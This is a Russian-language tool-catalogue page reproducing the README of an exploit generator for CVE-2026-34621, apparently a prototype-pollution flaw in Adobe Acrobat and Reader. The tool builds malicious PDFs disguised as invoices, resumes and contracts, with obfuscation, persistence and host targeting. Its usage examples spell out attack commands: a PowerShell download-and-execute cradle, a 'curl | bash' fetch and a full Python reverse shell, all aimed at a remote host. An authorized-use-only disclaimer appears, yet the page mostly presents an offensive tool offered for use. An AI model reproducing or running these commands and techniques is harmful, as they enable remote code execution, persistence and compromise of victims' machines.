Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve_2026_34621_advanced — Сложный кроссплатформенный генератор эксплойтов для **CVE-2026-34621** — критической уязвимости загрязнения прототипа в Adobe Acrobat и Reader, которая приводит к обходу песочницы и произвольному выполнению кода в Windows и macOS. | Kitploit
Инструменты/GitHubGitHub/null200ok/cve_2026_34621_advanced
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubnull200ok/cve_2026_34621_advanced

cve_2026_34621_advanced

Сложный кроссплатформенный генератор эксплойтов для **CVE-2026-34621** — критической уязвимости загрязнения прототипа в Adobe Acrobat и Reader, которая приводит к обходу песочницы и произвольному выполнению кода в Windows и macOS.

Репозиторий
136125 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-34621 Advanced Exploit Generator

Python 3.7+ License

Сложный кроссплатформенный генератор эксплойтов для CVE-2026-34621 — критической уязвимости загрязнения прототипа в Adobe Acrobat и Reader, которая приводит к обходу песочницы и выполнению произвольного кода в Windows и macOS.

⚠️ ВАЖНОЕ ПРЕДУПРЕЖДЕНИЕ
Этот инструмент предназначен только для авторизованных исследований в области безопасности и пентеста.
Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения, является незаконным. Автор не несёт ответственности за неправомерное использование.


📋 Содержание

  • Обзор
  • Возможности
  • Установка
  • Быстрый старт
  • Примеры использования
    • Команды для Windows
    • Команды для macOS
    • Тестирование на мобильных устройствах
  • Параметры командной строки
  • Принцип работы
  • Затронутые версии
  • Меры защиты
  • Участие в разработке
  • Лицензия

🔍 Обзор

CVE-2026-34621 — это уязвимость нулевого дня в Adobe Acrobat и Reader, которая позволяет атакующему:

  1. Загрязнить прототип объекта JavaScript в движке Adobe.
  2. Обойти песочницу безопасности.
  3. Выполнить произвольные системные команды на машине жертвы.

Этот генератор создаёт вредоносный PDF-файл, который при открытии в уязвимой версии Adobe Reader автоматически выполняет полезную нагрузку, адаптированную под операционную систему жертвы.

Поддерживаемые целевые платформы:

  • ✅ Windows (полное выполнение произвольного кода)
  • ✅ macOS (полное выполнение произвольного кода)
  • ❌ Android / iOS (не уязвимы — только демонстрационный запасной вариант)

✨ Возможности

КатегорияВозможности
Кроссплатформенные полезные нагрузкиАвтоматическое определение ОС и выбор соответствующего метода выполнения команд Windows или macOS.
Несколько векторов выполненияcmd.exe, PowerShell, WScript.Shell (Windows) / Terminal.app, osascript (macOS).
Поэтапные полезные нагрузкиЗагрузка и выполнение полезных нагрузок второго этапа с удалённого URL-адреса.
ПостоянствоУстановка ключа автозагрузки в реестре (Windows) или LaunchAgent (macOS).
Методы обходаТри уровня обфускации JavaScript, привязка к окружению, задержки выполнения, полиморфный код.
Встраивание в PDF-приманкуОбъединение эксплойта с легитимно выглядящим PDF-файлом (требуется PyPDF2).
Несколько триггеровOpenAction, действие при открытии страницы или JavaScript на уровне документа.
Подробные отчётыОтчёты в форматах HTML, TXT и JSON с описанием конфигурации полезной нагрузки.

📦 Установка

1. Клонирование репозитория

git clone https://github.com/NULL200OK/CVE-2026-34621-Exploit.git
cd CVE-2026-34621-Exploit

2. (Необязательно) Создание виртуального окружения

python3 -m venv venv
source venv/bin/activate      # Linux/macOS
venv\Scripts\activate         # Windows

3. Установка зависимостей

Основной скрипт использует только стандартную библиотеку Python. Для функции объединения с PDF-приманкой установите PyPDF2:

pip install PyPDF2

🚀 Быстрый старт

Сгенерируйте базовый PDF-файл, который открывает калькулятор в Windows и macOS:

python3 cve_2026_34621_advanced.py -o test.pdf

Будут созданы следующие файлы:

test.pdf — вредоносный PDF-файл.

test_report.html — подробный HTML-отчёт.

test_report.txt — текстовое резюме.

test_config.json — экспорт конфигурации в JSON.

💻 Примеры использования

Команды для Windows

1-Сценарий Команда

A-Базовое всплывающее окно calc.exe

python cve_2026_34621_advanced.py -o invoice.pdf --win calc.exe

Обратная оболочка PowerShell

python cve_2026_34621_advanced.py -o contract.pdf --win "powershell -NoP -Ep Bypass -C \"IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/shell.ps1')\""

Поэтапная полезная нагрузка с постоянством

python cve_2026_34621_advanced.py -o resume.pdf --win calc.exe --stage http://192.168.1.100/payload.exe -p

Привязка к окружению (запуск только на "SALES-PC")

python cve_2026_34621_advanced.py -o targeted.pdf --win calc.exe -k SALES-PC

С уровнем обфускации 2 и задержкой 10 секунд

python cve_2026_34621_advanced.py -o delayed.pdf --win calc.exe -O 2 -d 10

Команды для macOS

2-Сценарий Команда

Открыть калькулятор

python cve_2026_34621_advanced.py -o invoice.pdf --mac "open /System/Applications/Calculator.app"

Загрузка и выполнение скрипта

python cve_2026_34621_advanced.py -o update.pdf --mac "curl -s http://10.0.0.5/mac_payload.sh | bash"

Обратная оболочка через Python

python cve_2026_34621_advanced.py -o shell.pdf --mac "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"

Постоянство через LaunchAgent

python cve_2026_34621_advanced.py -o persist.pdf --mac "open /Applications/Calculator.app" -p

Встраивание в PDF-приманку

python cve_2026_34621_advanced.py -o safe_invoice.pdf -l /path/to/real_invoice.pdf --trigger pageopen

3-Примечание о мобильном тестировании

Сам скрипт запускается на настольных системах (Windows/macOS/Linux) для генерации PDF-файла. Сгенерированный PDF можно открыть на устройствах Android или iOS, но:

Мобильные версии Adobe Acrobat Reader не уязвимы к CVE-2026-34621.

Вместо выполнения системных команд полезная нагрузка запустит безобидный демонстрационный запасной вариант (откроет URL-адрес или покажет предупреждение).

📖 Параметры командной строки

Параметр Описание

-o, --output FILE Обязательный. Имя выходного PDF-файла.

--win CMD Команда Windows для выполнения (по умолчанию: calc.exe).

--mac CMD Команда macOS для выполнения (по умолчанию: open /System/Applications/Calculator.app).

--stage URL URL-адрес для загрузки полезной нагрузки второго этапа.

-p, --persistence Установка механизма постоянства (реестр/LaunchAgent).

-O, --obfuscate LEVEL Уровень обфускации JavaScript (0=нет, 1=базовый, 2=средний, 3=продвинутый).

-d, --delay SECONDS Задержка выполнения на указанное количество секунд.

-k, --key HOSTNAME Привязка к окружению — выполнение только при совпадении имени хоста.

-l, --lure PDF Путь к легитимному PDF-файлу для использования в качестве приманки (объединяет эксплойт).

--trigger TYPE Вектор запуска: openaction, pageopen или doclevel.

--no-reports Пропустить генерацию отчётов HTML/TXT/JSON.

--seed N Установить начальное значение генератора случайных чисел для воспроизводимой полиморфной генерации.

⚙️ Принцип работы

Цепочка атаки

Загрязнение прототипа:

Встроенный JavaScript изменяет Object.prototype для внедрения вредоносных свойств (__trusted, privileged и т. д.). Это нарушает границу доверия JavaScript-движка Adobe.

Повышение контекста

Из-за загрязнённого прототипа движок ошибочно обрабатывает недоверенный JavaScript документа так, как если бы он выполнялся в привилегированном контексте.

Доступ к привилегированным API

Скрипт теперь может вызывать ограниченные API, такие как app.launchURL, util.readFileIntoStream и app.trustedFunction.

Обход песочницы

Эти API обеспечивают доступ к файловой системе и выполнение процессов за пределами песочницы Adobe.

Выполнение произвольного кода

Скачать инструмент